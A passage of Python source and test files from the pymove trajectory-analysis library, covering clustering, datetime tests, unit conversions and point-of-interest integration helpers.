random_state: int, RandomState instance
Determines random number generation for centroid initialization.
Use an int to make the randomness deterministic, by default None
Returns
-------
dict
The error value for each cluster number
Notes
-----
https://anaconda.org/milesgranger/gap-statistic/notebook
"""
message = 'Executing Gap Statistic to:\n...K of %srs to %srs from k_iteration:%srs\n'
message = message % (k_initial, max_clusters, k_iteration)
print(message, flush=True)
gaps = {}
np.random.seed(random_state)
for k in progress_bar(range(k_initial, max_clusters + 1, k_iteration)):
# Holder for reference dispersion results
ref_disps = np.zeros(nrefs)
# For n references, generate random sample and perform kmeans
# getting resulting dispersion of each loop
for i in range(nrefs):
# Create new random reference set
random_reference = np.random.random_sample(size=move_data.shape)
# Fit to it
km = KMeans(n_clusters=k, random_state=random_state)
ref_disps[i] = km.fit(random_reference).inertia_
# Fit cluster to original data and create dispersion
km = KMeans(k).fit(move_data[[LATITUDE, LONGITUDE]])
orig_disp = km.inertia_
# Calculate gap statistic
gap = np.log(np.mean(ref_disps)) - np.log(orig_disp)
# Assign this loop gap statistic to gaps
gaps[k] = gap
return gaps
@timer_decorator
def dbscan_clustering(
move_data: DataFrame,
cluster_by: Text,
meters: Optional[int] = 10,
min_sample: Optional[float] = 1680 / 2,
earth_radius: Optional[float] = EARTH_RADIUS,
metric: Optional[Union[Text, Callable]] = 'euclidean',
inplace: Optional[bool] = False
) -> Optional[DataFrame]:
"""
Performs density based clustering on the move_dataframe according to cluster_by
Parameters
----------
move_data : dataframe
the input trajectory
cluster_by : str
the colum to cluster
meters : int, optional
distance to use in the clustering, by default 10
min_sample : float, optional
the minimum number of samples to consider a cluster, by default 1680/2
earth_radius : int
Y offset from your original position in meters, by default EARTH_RADIUS
metric: string, or callable, optional
The metric to use when calculating distance between instances in a feature array
by default 'euclidean'
inplace : bool, optional
Whether to return a new DataFrame, by default False
Returns
-------
DataFrame
Clustered dataframe or None
"""
if not inplace:
move_data = move_data[:]
move_data.reset_index(drop=True, inplace=True)
move_data[N_CLUSTER] = -1
for cluster_id in progress_bar(move_data[cluster_by].unique(), desc='Clustering'):
df_filter = move_data[move_data[cluster_by] == cluster_id]
dbscan = DBSCAN(
eps=meters_to_eps(meters, earth_radius),
min_samples=min_sample,
metric=metric
)
dbscan_result = dbscan.fit(df_filter[[LATITUDE, LONGITUDE]].to_numpy())
idx = df_filter.index
res = dbscan_result.labels_ + move_data[N_CLUSTER].max() + 1
move_data.at[idx, N_CLUSTER] = res
if not inplace:
return move_data
```
#### File: pymove/tests/test_utils_datetime.py
```python
import datetime as dt
from numpy import nan
from numpy.testing import assert_equal
from pandas import DataFrame, Timestamp
from pandas.testing import assert_frame_equal
from pymove import MoveDataFrame, datetime
from pymove.utils.constants import (
COUNT,
LOCAL_LABEL,
MAX,
MEAN,
MIN,
PREV_LOCAL,
STD,
SUM,
THRESHOLD,
TIME_TO_PREV,
)
default_date = dt.datetime.strptime('2018-03-12', '%Y-%m-%d')
default_date_time = dt.datetime.strptime('2018-03-12 12:08:07', '%Y-%m-%d %H:%M:%S')
str_date_default = '2018-03-12'
str_date_time_default = '2018-03-12 12:08:07'
list_data = [
[39.984094, 116.319236, '2008-10-23 05:44:05', 1],
[39.984198, 116.319322, '2008-10-23 05:56:06', 1],
[39.984224, 116.319402, '2008-10-23 05:56:11', 1],
[39.984224, 116.319402, '2008-10-23 06:10:15', 1],
]
def _default_move_df():
return MoveDataFrame(
data=list_data,
)
def test_date_to_str():
expected = '2008-10-23'
time_str = datetime.date_to_str(Timestamp('2008-10-23 05:53:05'))
assert(time_str == expected)
def test_str_to_datetime():
expected_date = default_date
expected_date_time = default_date_time
converted_date = datetime.str_to_datetime('2018-03-12')
assert(converted_date == expected_date)
converted_date_time = datetime.str_to_datetime('2018-03-12 12:08:07')
assert(converted_date_time == expected_date_time)
def test_to_str():
expected = str_date_time_default
data = default_date_time
str_date_time = datetime.to_str(data)
assert(str_date_time == expected)
def test_to_min():
expected = 25347608
data = default_date_time
date_to_min = datetime.to_min(data)
assert(date_to_min == expected)
def test_min_to_datetime():
expected = dt.datetime.strptime('2018-03-12 12:08:00',
'%Y-%m-%d %H:%M:%S')
data = 25347608
min_to_date = datetime.min_to_datetime(data)
assert(min_to_date == expected)
def test_to_day_of_week_int():
expected = 0
data = default_date
date_to_day_week = datetime.to_day_of_week_int(data)
assert(date_to_day_week == expected)
data = default_date_time
date_to_day_week = datetime.to_day_of_week_int(data)
assert(date_to_day_week == expected)
def test_working_day():
data = str_date_default
working_day = datetime.working_day(data)
assert(working_day is True)
data = default_date
working_day = datetime.working_day(data)
assert(working_day is True)
data = '2018-03-17'
working_day = datetime.working_day(data)
assert(working_day is False)
data = dt.datetime.strptime('2018-10-12', '%Y-%m-%d')
working_day = datetime.working_day(data, country='BR')
assert(working_day is False)
def test_now_str():
expected = datetime.to_str(dt.datetime.now())
time_now = datetime.now_str()
assert(time_now == expected)
def test_deltatime_str():
expected = '05.03s'
actual = datetime.deltatime_str(5.03)
assert expected == actual
expected = '18m:35.00s'
actual = datetime.deltatime_str(1115)
assert expected == actual
expected = '03h:05m:15.00s'
actual = datetime.deltatime_str(11115)
assert expected == actual
def test_timestamp_to_millis():
expected = 1520856487000
data = str_date_time_default
milliseconds = datetime.timestamp_to_millis(data)
assert(milliseconds == expected)
def test_millis_to_timestamp():
expected = default_date_time
data = 1520856487000
timestamp = datetime.millis_to_timestamp(data)
assert(timestamp == expected)
def test_time_to_str():
expected = '12:08:07'
data = default_date_time
time = datetime.time_to_str(data)
assert(time == expected)
def test_elapsed_time_dt():
data = default_date_time
expected = datetime.diff_time(default_date_time,
dt.datetime.now())
elapsed_time = datetime.elapsed_time_dt(data)
assert abs(elapsed_time - expected) <= 5
def test_diff_time():
expected = 388313000
start_date = default_date_time
end_date = dt.datetime.strptime('2018-03-17', '%Y-%m-%d')
diff_time = datetime.diff_time(start_date, end_date)
assert(diff_time == expected)
def test_create_time_slot_in_minute():
df = _default_move_df()
expected = DataFrame({
'lat': {0: 39.984094, 1: 39.984198, 2: 39.984224, 3: 39.984224},
'lon': {0: 116.319236, 1: 116.319322, 2: 116.319402, 3: 116.319402},
'datetime': {
0: Timestamp('2008-10-23 05:44:05'),
1: Timestamp('2008-10-23 05:56:06'),
2: Timestamp('2008-10-23 05:56:11'),
3: Timestamp('2008-10-23 06:10:15')
},
'id': {0: 1, 1: 1, 2: 1, 3: 1},
'time_slot': {0: 22, 1: 23, 2: 23, 3: 24}
})
datetime.create_time_slot_in_minute(df)
assert_frame_equal(df, expected)
def test_generate_time_statistics():
df_ = DataFrame(
data=[
[261, nan, nan],
[580, 261, 252],
[376, 580, 91],
[386, 376, 17449],
[644, 386, 21824]
],
columns=[LOCAL_LABEL, PREV_LOCAL, TIME_TO_PREV],
index=[0, 1, 2, 3, 4]
)
expected = DataFrame(
data=[
[376, 580.0, 91.0, 0.0, 91.0, 91.0, 91.0, 1],
[386, 376.0, 17449.0, 0.0, 17449.0, 17449.0, 17449.0, 1],
[580, 261.0, 252.0, 0.0, 252.0, 252.0, 252.0, 1],
[644, 386.0, 21824.0, 0.0, 21824.0, 21824.0, 21824.0, 1]
],
columns=[LOCAL_LABEL, PREV_LOCAL, MEAN, STD, MIN, MAX, SUM, COUNT],
index=[0, 1, 2, 3]
)
df_statistics = datetime.generate_time_statistics(df_)
assert_frame_equal(df_statistics, expected)
def test_calc_time_threshold():
mean1, std1 = 0.0, 91.0
mean2, std2 = 0.0, 17449.0
mean3, std3 = 0.0, 252.0
mean4, std4 = 0.0, 21824.0
expected1 = 91.0
expected2 = 17449.0
expected3 = 252.0
expected4 = 21824.0
threshold1 = datetime._calc_time_threshold(mean1, std1)
threshold2 = datetime._calc_time_threshold(mean2, std2)
threshold3 = datetime._calc_time_threshold(mean3, std3)
threshold4 = datetime._calc_time_threshold(mean4, std4)
assert_equal(threshold1, expected1)
assert_equal(threshold2, expected2)
assert_equal(threshold3, expected3)
assert_equal(threshold4, expected4)
def test_threshold_time_statistics():
statistics = DataFrame(
data=[
[376, 580.0, 91.0, 0.0, 91.0, 91.0, 91.0, 1],
[386, 376.0, 17449.0, 0.0, 17449.0, 17449.0, 17449.0, 1],
[580, 261.0, 252.0, 0.0, 252.0, 252.0, 252.0, 1],
[644, 386.0, 21824.0, 0.0, 21824.0, 21824.0, 21824.0, 1]
],
columns=[LOCAL_LABEL, PREV_LOCAL, MEAN, STD, MIN, MAX, SUM, COUNT],
index=[0, 1, 2, 3]
)
expected = DataFrame(
data=[
[376, 580.0, 91.0, 0.0, 91.0, 91.0, 91.0, 1, 91.0],
[386, 376.0, 17449.0, 0.0, 17449.0, 17449.0, 17449.0, 1, 17449.0],
[580, 261.0, 252.0, 0.0, 252.0, 252.0, 252.0, 1, 252.0],
[644, 386.0, 21824.0, 0.0, 21824.0, 21824.0, 21824.0, 1, 21824.0]
],
columns=[
LOCAL_LABEL, PREV_LOCAL, MEAN, STD, MIN, MAX, SUM, COUNT, THRESHOLD
],
index=[0, 1, 2, 3]
)
datetime.threshold_time_statistics(statistics)
assert_frame_equal(statistics, expected)
```
#### File: pymove/utils/conversions.py
```python
import math
from typing import TYPE_CHECKING, List, Optional, Text, Union
import numpy as np
from pandas import DataFrame
from shapely.geometry import Point
from pymove.utils.constants import (
DIST_TO_PREV,
EARTH_RADIUS,
GEOMETRY,
LATITUDE,
LONGITUDE,
SPEED_TO_PREV,
TIME_TO_PREV,
)
if TYPE_CHECKING:
from pymove.core.dask import DaskMoveDataFrame
from pymove.core.pandas import PandasMoveDataFrame
def lat_meters(lat: float) -> float:
"""
Transform latitude degree to meters.
Parameters
----------
lat : float
This represent latitude value.
Returns
-------
float
Represents the corresponding latitude value in meters.
Examples
--------
Latitude in Fortaleza: -3.8162973555
>>> from pymove.utils.conversions import lat_meters
>>> lat_meters(-3.8162973555)
110826.6722516857
"""
rlat = float(lat) * math.pi / 180
# meter per degree Latitude
meters_lat = (
111132.92 - 559.82 * math.cos(2 * rlat) + 1.175 * math.cos(4 * rlat)
)
# meter per degree Longitude
meters_lgn = 111412.84 * math.cos(rlat) - 93.5 * math.cos(3 * rlat)
meters = (meters_lat + meters_lgn) / 2
return meters
def meters_to_eps(
radius_meters: float, earth_radius: Optional[float] = EARTH_RADIUS
) -> float:
"""
Converts radius in meters to eps
Parameters
----------
radius_meters : float
radius in meters
earth_radius : float, optional
radius of the earth in the location, by default EARTH_RADIUS
Returns
-------
float
radius in eps
"""
return radius_meters / earth_radius
def list_to_str(input_list: List, delimiter: Optional[Text] = ',') -> Text:
"""
Concatenates list elements, joining them by the separator specified by the
parameter "delimiter".
Parameters
----------
input_list : list
List with elements to be joined.
delimiter : str, optional
The separator used between elements, by default ','.
Returns
-------
str
Returns a string, resulting from concatenation of list elements,
separeted by the delimiter.
"""
return delimiter.join(
[x if isinstance(x, str) else repr(x) for x in input_list]
)
def list_to_csv_str(input_list: List) -> Text:
"""
Concatenates the elements of the list, joining them by ",".
Parameters
----------
input_list : list
List with elements to be joined.
Returns
-------
str
Returns a string, resulting from concatenation of list elements,
separeted by ",".
Example
-------
>>> from pymove import conversions
>>> a = [1, 2, 3, 4, 5]
>>> conversions.list_to_csv_str(a)
'1 1:2 2:3 3:4 4:5'
"""
return list_to_str(input_list)
def list_to_svm_line(original_list: List) -> Text:
"""
Concatenates list elements in consecutive element pairs.
Parameters
----------
original_list : list
The elements to be joined
Returns
-------
str
Returns a string, resulting from concatenation of list elements
in consecutive element pairs, separeted by " ".
Example
-------
>>> from pymove import conversions
>>> a = [1, 2, 3, 4, 5]
>>> conversions.list_to_svm_line(a)
'1 1:2 2:3 3:4 4:5'
"""
list_size = len(original_list)
svm_line = '%s ' % original_list[0]
for i in range(1, list_size):
svm_line += '%s:%s ' % (i, original_list[i])
return svm_line.rstrip()
def lon_to_x_spherical(lon: float) -> float:
"""
Convert longitude to X EPSG:3857 WGS 84/Pseudo-Mercator.
Parameters
----------
lon : float
Represents longitude.
Returns
-------
float
X offset from your original position in meters.
Examples
--------
>>> from pymove import conversions
>>> conversions.lon_to_x_spherical(-38.501597 )
-4285978.17
References
----------
https://epsg.io/transform
"""
return 6378137 * np.radians(lon)
def lat_to_y_spherical(lat: float) -> float:
"""
Convert latitude to Y EPSG:3857 WGS 84/Pseudo-Mercator.
Parameters
----------
lat : float
Represents latitude.
Returns
-------
float
Y offset from your original position in meters.
Examples
--------
>>> from pymove import conversions
>>> conversions.lat_to_y_spherical(-3.797864)
-423086.2213610324
References
----------
https://epsg.io/transform
"""
return 6378137 * np.log(np.tan(np.pi / 4 + np.radians(lat) / 2.0))
def x_to_lon_spherical(x: float) -> float:
"""
Convert X EPSG:3857 WGS 84 / Pseudo-Mercator to longitude.
Parameters
----------
x : float
X offset from your original position in meters.
Returns
-------
float
Represents longitude.
Examples
--------
>>> from pymove import conversions
>>> conversions.x_to_lon_spherical(-4285978.17)
-38.501597
References
----------
https://epsg.io/transform
"""
return np.degrees(x / 6378137.0)
def y_to_lat_spherical(y: float) -> float:
"""
Convert Y EPSG:3857 WGS 84 / Pseudo-Mercator to latitude.
Parameters
----------
y : float
Y offset from your original position in meters.
Returns
-------
float
Represents latitude.
Examples
--------
>>> from pymove import conversions
>>> conversions.y2_lat_spherical(-423086.22)
-3.797864
References
----------
https://epsg.io/transform
"""
return np.degrees(np.arctan(np.sinh(y / 6378137.0)))
def geometry_points_to_lat_and_lon(
move_data: DataFrame,
geometry_label: Optional[Text] = GEOMETRY,
drop_geometry: Optional[bool] = True,
inplace: Optional[bool] = True
) -> DataFrame:
"""
Converts the geometry column to latitude and longitude
columns (named 'lat' and 'lon'), removing geometries
that are not of the Point type.
Parameters
----------
move_data : DataFrame
Input trajectory data.
geometry: str, optional
Represents column name of the geometry column, by default GEOMETRY
drop_geometry: bool, optional
Option to drop the geometry column, by default True
inplace: bool, optional
Whether the operation will be done in the original dataframe, by default True
Returns
-------
DataFrame
A new dataframe with the converted feature or None
"""
if not inplace:
move_data = move_data[:]
move_data = move_data[
move_data[geometry_label].map(type) == Point
]
move_data[LONGITUDE] = move_data[geometry_label].map(lambda p: p.x)
move_data[LATITUDE] = move_data[geometry_label].map(lambda q: q.y)
if drop_geometry:
move_data.drop(geometry_label, axis=1, inplace=True)
if not inplace:
return move_data
def lat_and_lon_decimal_degrees_to_decimal(
move_data: DataFrame,
latitude: Optional[Text] = LATITUDE,
longitude: Optional[Text] = LONGITUDE
) -> DataFrame:
"""
Converts latitude and longitude format from
decimal degrees to decimal format.
Parameters
----------
move_data : DataFrame
Input trajectory data.
latitude: str, optional
Represents column name of the latitude column, by default LATITUDE
longitude: str, optional
Represents column name of the longitude column, by default LONGITUDE
Returns
-------
DataFrame
A new dataframe with the converted feature
"""
def _decimal_degree_to_decimal(row):
if (row[latitude][-1:] == 'N'):
row[latitude] = float(row[latitude][:-1])
else:
row[latitude] = float(row[latitude][:-1]) * -1
if (row[longitude][-1:] == 'E'):
row[longitude] = float(row[longitude][:-1])
else:
row[longitude] = float(row[longitude][:-1]) * -1
return row
return move_data.apply(_decimal_degree_to_decimal, axis=1)
def ms_to_kmh(
move_data: Union['PandasMoveDataFrame', 'DaskMoveDataFrame'],
label_speed: Optional[Text] = SPEED_TO_PREV,
new_label: Optional[Text] = None,
inplace: Optional[bool] = True,
) -> Optional[Union['PandasMoveDataFrame', 'DaskMoveDataFrame']]:
"""
Convert values, in ms, in label_speed column to kmh.
Parameters
----------
move_data : DataFrame
Input trajectory data.
label_speed : str, optional
Represents column name of speed, by default SPEED_TO_PREV
new_label: str, optional
Represents a new column that will contain the conversion result, by default None
inplace: bool, optional
Whether the operation will be done in the original dataframe, by default True
Returns
-------
DataFrame
A new dataframe with the converted feature or None
"""
if not inplace:
move_data = move_data[:]
if label_speed not in move_data:
move_data.generate_dist_time_speed_features()
move_data[label_speed] = move_data[label_speed].apply(
lambda row: row * 3.6
)
if new_label is not None:
move_data.rename(columns={label_speed: new_label}, inplace=True)
if not inplace:
return move_data
def kmh_to_ms(
move_data: Union['PandasMoveDataFrame', 'DaskMoveDataFrame'],
label_speed: Optional[Text] = SPEED_TO_PREV,
new_label: Optional[Text] = None,
inplace: Optional[Text] = True,
) -> Optional[Union['PandasMoveDataFrame', 'DaskMoveDataFrame']]:
"""
Convert values, in kmh, in label_speed column to ms.
Parameters
----------
move_data : DataFame
Input trajectory data.
label_speed : str, optional
Represents column name of speed, by default SPEED_TO_PREV
new_label: str, optional
Represents a new column that will contain the conversion result, by default None
inplace: bool, optional
Whether the operation will be done in the original dataframe, by default True
Returns
-------
DataFrame
A new dataframe with the converted feature or None
"""
if not inplace:
move_data = move_data[:]
if label_speed not in move_data:
move_data.generate_dist_time_speed_features()
ms_to_kmh(move_data, label_speed)
move_data[label_speed] = move_data[label_speed].apply(
lambda row: row / 3.6
)
if new_label is not None:
move_data.rename(columns={label_speed: new_label}, inplace=True)
if not inplace:
return move_data
def meters_to_kilometers(
move_data: Union['PandasMoveDataFrame', 'DaskMoveDataFrame'],
label_distance: Optional[Text] = DIST_TO_PREV,
new_label: Optional[Text] = None,
inplace: Optional[Text] = True,
) -> Optional[Union['PandasMoveDataFrame', 'DaskMoveDataFrame']]:
"""
Convert values, in meters, in label_distance column to kilometers.
Parameters
----------
move_data : DataFame
Input trajectory data.
label_distance : str, optional
Represents column name of speed, by default DIST_TO_PREV
new_label: str, optional
Represents a new column that will contain the conversion result, by default None
inplace: bool, optional
Whether the operation will be done in the original dataframe, by default True
Returns
-------
DataFrame
A new dataframe with the converted feature or None
"""
if not inplace:
move_data = move_data[:]
if label_distance not in move_data:
move_data.generate_dist_time_speed_features()
move_data[label_distance] = move_data[label_distance].apply(
lambda row: row / 1000
)
if new_label is not None:
move_data.rename(columns={label_distance: new_label}, inplace=True)
if not inplace:
return move_data
def kilometers_to_meters(
move_data: Union['PandasMoveDataFrame', 'DaskMoveDataFrame'],
label_distance: Optional[Text] = DIST_TO_PREV,
new_label: Optional[Text] = None,
inplace: Optional[Text] = True,
) -> Optional[Union['PandasMoveDataFrame', 'DaskMoveDataFrame']]:
"""
Convert values, in kilometers, in label_distance column to meters.
Parameters
----------
move_data : DataFame
Input trajectory data.
label_distance : str, optional
Represents column name of speed, by default DIST_TO_PREV
new_label: str, optional
Represents a new column that will contain the conversion result, by default None
inplace: bool, optional
Whether the operation will be done in the original dataframe, by default True
Returns
-------
DataFrame
A new dataframe with the converted feature or None
"""
if not inplace:
move_data = move_data[:]
if label_distance not in move_data:
move_data.generate_dist_time_speed_features()
meters_to_kilometers(move_data, label_distance)
move_data[label_distance] = move_data[label_distance].apply(
lambda row: row * 1000
)
if new_label is not None:
move_data.rename(columns={label_distance: new_label}, inplace=True)
if not inplace:
return move_data
def seconds_to_minutes(
move_data: Union['PandasMoveDataFrame', 'DaskMoveDataFrame'],
label_time: Optional[Text] = TIME_TO_PREV,
new_label: Optional[Text] = None,
inplace: Optional[Text] = True,
) -> Optional[Union['PandasMoveDataFrame', 'DaskMoveDataFrame']]:
"""
Convert values, in seconds, in label_distance column to minutes.
Parameters
----------
move_data : DataFame
Input trajectory data.
label_time : str, optional
Represents column name of speed, by default TIME_TO_PREV
new_label: str, optional
Represents a new column that will contain the conversion result, by default None
inplace: bool, optional
Whether the operation will be done in the original dataframe, by default True
Returns
-------
DataFrame
A new dataframe with the converted feature or None
"""
if not inplace:
move_data = move_data[:]
if label_time not in move_data:
move_data.generate_dist_time_speed_features()
move_data[label_time] = move_data[label_time].apply(
lambda row: row / 60.0
)
if new_label is not None:
move_data.rename(columns={label_time: new_label}, inplace=True)
if not inplace:
return move_data
def minute_to_seconds(
move_data: Union['PandasMoveDataFrame', 'DaskMoveDataFrame'],
label_time: Optional[Text] = TIME_TO_PREV,
new_label: Optional[Text] = None,
inplace: Optional[Text] = True,
) -> Optional[Union['PandasMoveDataFrame', 'DaskMoveDataFrame']]:
"""
Convert values, in minutes, in label_distance column to seconds.
Parameters
----------
move_data : DataFame
Input trajectory data.
label_time : str, optional
Represents column name of speed, by default TIME_TO_PREV
new_label: str, optional
Represents a new column that will contain the conversion result, by default None
inplace: bool, optional
Whether the operation will be done in the original dataframe, by default True
Returns
-------
DataFrame
A new dataframe with the converted feature or None
"""
if not inplace:
move_data = move_data[:]
if label_time not in move_data:
move_data.generate_dist_time_speed_features()
seconds_to_minutes(move_data, label_time)
move_data['time_to_prev'] = move_data['time_to_prev'].apply(
lambda row: row * 60.0
)
if new_label is not None:
move_data.rename(columns={label_time: new_label}, inplace=True)
if not inplace:
return move_data
def minute_to_hours(
move_data: Union['PandasMoveDataFrame', 'DaskMoveDataFrame'],
label_time: Optional[Text] = TIME_TO_PREV,
new_label: Optional[Text] = None,
inplace: Optional[Text] = True,
) -> Optional[Union['PandasMoveDataFrame', 'DaskMoveDataFrame']]:
"""
Convert values, in minutes, in label_distance column to hours.
Parameters
----------
move_data : DataFame
Input trajectory data.
label_time : str, optional
Represents column name of speed, by default TIME_TO_PREV
new_label: str, optional
Represents a new column that will contain the conversion result, by default None
inplace: bool, optional
Whether the operation will be done in the original dataframe, by default True
Returns
-------
DataFrame
A new dataframe with the converted feature or None
"""
if not inplace:
move_data = move_data[:]
if label_time not in move_data:
move_data.generate_dist_time_speed_features()
seconds_to_minutes(move_data, label_time)
move_data[label_time] = move_data[label_time].apply(
lambda row: row / 60.0
)
if new_label is not None:
move_data.rename(columns={label_time: new_label}, inplace=True)
if not inplace:
return move_data
def hours_to_minute(
move_data: Union['PandasMoveDataFrame', 'DaskMoveDataFrame'],
label_time: Optional[Text] = TIME_TO_PREV,
new_label: Optional[Text] = None,
inplace: Optional[Text] = True,
) -> Optional[Union['PandasMoveDataFrame', 'DaskMoveDataFrame']]:
"""
Convert values, in hours, in label_distance column to minute.
Parameters
----------
move_data : DataFame
Input trajectory data.
label_time : str, optional
Represents column name of speed, by default TIME_TO_PREV
new_label: str, optional
Represents a new column that will contain the conversion result, by default None
inplace: bool, optional
Whether the operation will be done in the original dataframe, by default True
Returns
-------
DataFrame
A new dataframe with the converted feature or None
"""
if not inplace:
move_data = move_data[:]
if label_time not in move_data:
move_data.generate_dist_time_speed_features()
seconds_to_hours(move_data, label_time)
move_data[label_time] = move_data[label_time].apply(
lambda row: row * 60.0
)
if new_label is not None:
move_data.rename(columns={label_time: new_label}, inplace=True)
if not inplace:
return move_data
def seconds_to_hours(
move_data: Union['PandasMoveDataFrame', 'DaskMoveDataFrame'],
label_time: Optional[Text] = TIME_TO_PREV,
new_label: Optional[Text] = None,
inplace: Optional[Text] = True,
) -> Optional[Union['PandasMoveDataFrame', 'DaskMoveDataFrame']]:
"""
Convert values, in seconds, in label_distance column to hours.
Parameters
----------
move_data : DataFame
Input trajectory data.
label_time : str, optional
Represents column name of speed, by default TIME_TO_PREV
new_label: str, optional
Represents a new column that will contain the conversion result, by default None
inplace: bool, optional
Whether the operation will be done in the original dataframe, by default True
Returns
-------
DataFrame
A new dataframe with the converted feature or None
"""
if not inplace:
move_data = move_data[:]
if label_time not in move_data:
move_data.generate_dist_time_speed_features()
move_data[label_time] = move_data[label_time].apply(
lambda row: row / 3600.0
)
if new_label is not None:
move_data.rename(columns={label_time: new_label}, inplace=True)
if not inplace:
return move_data
def hours_to_seconds(
move_data: Union['PandasMoveDataFrame', 'DaskMoveDataFrame'],
label_time: Optional[Text] = TIME_TO_PREV,
new_label: Optional[Text] = None,
inplace: Optional[Text] = True,
) -> Optional[Union['PandasMoveDataFrame', 'DaskMoveDataFrame']]:
"""
Convert values, in hours, in label_distance column to seconds.
Parameters
----------
move_data : DataFame
Input trajectory data.
label_time : str, optional
Represents column name of speed, by default TIME_TO_PREV
new_label: str, optional
Represents a new column that will contain the conversion result, by default None
inplace: bool, optional
Whether the operation will be done in the original dataframe, by default True
Returns
-------
DataFrame
A new dataframe with the converted feature or None
"""
if not inplace:
move_data = move_data[:]
if label_time not in move_data:
move_data.generate_dist_time_speed_features()
seconds_to_hours(move_data, label_time)
move_data[label_time] = move_data[label_time].apply(
lambda row: row * 3600.0
)
if new_label is not None:
move_data.rename(columns={label_time: new_label}, inplace=True)
if not inplace:
return move_data
```
#### File: pymove/utils/integration.py
```python
from typing import List, Optional, Text, Tuple
import numpy as np
from numpy import ndarray
from pandas import DataFrame, Timedelta
from pandas.core.series import Series
from pymove.preprocessing import filters
from pymove.utils.constants import (
ADDRESS,
CITY,
DATETIME,
DIST_EVENT,
DIST_HOME,
DIST_POI,
EVENT_ID,
EVENT_TYPE,
GEOMETRY,
HOME,
ID_POI,
LATITUDE,
LONGITUDE,
NAME_POI,
TRAJ_ID,
TYPE_POI,
VIOLATING,
)
from pymove.utils.distances import haversine
from pymove.utils.log import progress_bar
def union_poi_bank(data: DataFrame, label_poi: Optional[Text] = TYPE_POI):
"""
Performs the union between the different bank categories
for Points of Interest in a single category named 'banks'.
Parameters
----------
data : DataFrame
Input points of interest data
label_poi : str, optional
Label referring to the Point of Interest category, by default TYPE_POI
"""
print('union bank categories to one category')
print('... There are {} -- {}'.format(data[label_poi].nunique(), label_poi))
banks = [
'bancos_filiais',
'bancos_agencias',
'bancos_postos',
'bancos_PAE',
'bank',
]
filter_bank = data[label_poi].isin(banks)
data.at[data[filter_bank].index, label_poi] = 'banks'
def union_poi_bus_station(data: DataFrame, label_poi: Optional[Text] = TYPE_POI):
"""
Performs the union between the different bus station categories
for Points of Interest in a single category named 'bus_station'.
Parameters
----------
data : DataFrame
Input points of interest data
label_poi : str, optional
Label referring to the Point of Interest category, by default TYPE_POI
"""
print('union bus station categories to one category')
filter_bus_station = data[label_poi].isin(
['transit_station', 'pontos_de_onibus']
)
data.at[data[filter_bus_station].index, label_poi] = 'bus_station'
def union_poi_bar_restaurant(data: DataFrame, label_poi: Optional[Text] = TYPE_POI):
"""
Performs the union between bar and restaurant categories
for Points of Interest in a single category named 'bar-restaurant'.
Parameters
----------
data : DataFrame
Input points of interest data
label_poi : str, optional
Label referring to the Point of Interest category, by default TYPE_POI
"""
print('union restaurant and bar categories to one category')
filter_bar_restaurant = data[label_poi].isin(['restaurant', 'bar'])
data.at[data[filter_bar_restaurant].index, label_poi] = 'bar-restaurant'
def union_poi_parks(data: DataFrame, label_poi: Optional[Text] = TYPE_POI):
"""
Performs the union between park categories
for Points of Interest in a single category named 'parks'.
Parameters
----------
data : DataFrame
Input points of interest data
label_poi : str, optional
Label referring to the Point of Interest category, by default TYPE_POI
"""
print('union parks categories to one category')
filter_parks = data[label_poi].isin(['pracas_e_parques', 'park'])
data.at[data[filter_parks].index, label_poi] = 'parks'
def union_poi_police(data: DataFrame, label_poi: Optional[Text] = TYPE_POI):
"""
Performs the union between police categories
for Points of Interest in a single category named 'police'.
Parameters
----------
data : DataFrame
Input points of interest data
label_poi : str, optional
Label referring to the Point of Interest category, by default TYPE_POI
"""
print('union distritos policies and police categories')
filter_police = data[label_poi] == 'distritos_policiais'
data.at[data[filter_police].index, label_poi] = 'police'
def join_collective_areas(
gdf_: DataFrame, gdf_rules_: DataFrame, label_geometry: Optional[Text] = GEOMETRY
):
"""
It performs the integration between trajectories and collective
areas, generating a new column that informs if the point of the
trajectory is inserted in a collective area.
Parameters
----------
gdf_ : geopandas.GeoDataFrame
The input trajectory data
gdf_rules_ : geopandas.GeoDataFrame
The input coletive areas data
label_geometry : str, optional
Label referring to the Point of Interest category, by default GEOMETRY
"""
print('Integration between trajectories and collectives areas')
polygons = gdf_rules_[label_geometry].unique()
gdf_[VIOLATING] = False
for p in progress_bar(polygons):
# intersects = gdf_[label_geometry].apply(lambda x: x.intersects(p))
intersects = gdf_[label_geometry].intersects(p)
index = gdf_[intersects].index
gdf_.at[index, VIOLATING] = True
def _reset_and_creates_id_and_lat_lon(
data: DataFrame,
df_pois: DataFrame,
lat_lon_poi: Optional[bool] = True,
reset_index: Optional[bool] = True
) -> Tuple[ndarray, ndarray, ndarray, ndarray]:
"""
Resets the indexes of the dataframes, returns the minimum distance
between the two dataframes, and return their respective variables
(id, tags, latitude and longitude).
Parameters
----------
data : DataFrame
The input trajectory data.
df_pois : DataFrame
The input point of interest data.
lat_lon_poi : bool, optional
Flag to determine if the ids and tags is of size equivalent to df_pois,
by default True
reset_index : bool, optional
Flag for reset index of the df_pois and data dataframes before the join,
by default True
Returns
-------
distances, ids, tags, lat, lon: arrays with default values for join operation
"""
if reset_index:
print('... Resetting index to operation...')
data.reset_index(drop=True, inplace=True)
df_pois.reset_index(drop=True, inplace=True)
# create numpy array to store new column to DataFrame of movement objects
distances = np.full(
data.shape[0], np.Infinity, dtype=np.float64
)
ids = np.full(data.shape[0], '', dtype='object_')
tags = np.full(data.shape[0], '', dtype='object_')
# creating lat and lon array to operation
if lat_lon_poi:
lat = np.full(df_pois.shape[0], np.Infinity, dtype=np.float64)
lon = np.full(df_pois.shape[0], np.Infinity, dtype=np.float64)
else:
lat = np.full(data.shape[0], np.Infinity, dtype=np.float64)
lon = np.full(data.shape[0], np.Infinity, dtype=np.float64)
return distances, ids, tags, lat, lon
def _reset_set_window__and_creates_event_id_type(
data: DataFrame, df_events: DataFrame, label_date: Text, time_window: int
) -> Tuple[Series, Series, ndarray, ndarray, ndarray]:
"""
Resets the indexes of the dataframes, set time window, and returns
the current distance between the two dataframes, and return their
respective variables (event_id, event_type).
Parameters
----------
data : DataFrame
The input trajectory data.
df_events : DataFrame
The input event point of interest data.
label_date : str
Label of data referring to the datetime.
time_window : int
Number of seconds of the time window.
Returns
-------
window_starts, window_ends, current_distances, event_id, event_type
"""
# get a vector with windows time to each point
data.reset_index(drop=True, inplace=True)
df_events.reset_index(drop=True, inplace=True)
# compute windows time
window_starts = data[label_date] - Timedelta(seconds=time_window)
window_ends = data[label_date] + Timedelta(seconds=time_window)
# create vector to store distances
current_distances = np.full(
data.shape[0], np.Infinity, dtype=np.float64
